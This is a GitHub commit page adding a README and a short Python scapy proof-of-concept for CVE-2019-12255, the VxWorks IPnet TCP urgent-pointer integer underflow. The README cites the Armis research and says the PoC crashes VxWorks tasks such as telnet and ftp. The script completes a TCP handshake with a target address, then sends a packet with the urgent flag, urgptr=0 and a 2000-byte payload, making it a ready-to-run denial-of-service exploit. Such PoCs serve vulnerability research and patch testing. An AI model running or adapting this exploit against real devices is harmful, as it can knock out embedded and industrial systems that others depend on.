-
Notifications
You must be signed in to change notification settings - Fork 8
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
xzz
authored and
xzz
committed
Aug 11, 2019
1 parent
5e9c273
commit 9c6e603
Showing
4 changed files
with
30 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
## CVE-2019-12255 | ||
VxWorks TCP Urgent pointer = 0 integer underflow | ||
|
||
## Discovered By | ||
Armis Security | ||
|
||
## Vulnerability Summary | ||
The vulnerability exists in the IPnet stack of VxWorks. The details of the vulnerability can be found [here](https://i.blackhat.com/USA-19/Thursday/us-19-Seri-Critical-Zero-Days-Remotely-Compromise-The-Most-Popular-Real-Time-OS-wp.pdf). The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc. | ||
 | ||
|
||
 |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,19 @@ | ||
from scapy.all import * | ||
|
||
if __name__ == "__main__": | ||
ip = "192.168.10.199" | ||
dport = 23 | ||
seq_num = 1000 | ||
payload = "\x42"*2000 | ||
sport = random.randint(1024,65535) | ||
|
||
syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num) | ||
syn_ack = sr1(syn) | ||
|
||
seq_num = seq_num + 1 | ||
ack_num = syn_ack.seq+1 | ||
ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num) | ||
send(ack) | ||
|
||
psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload | ||
send(psh) |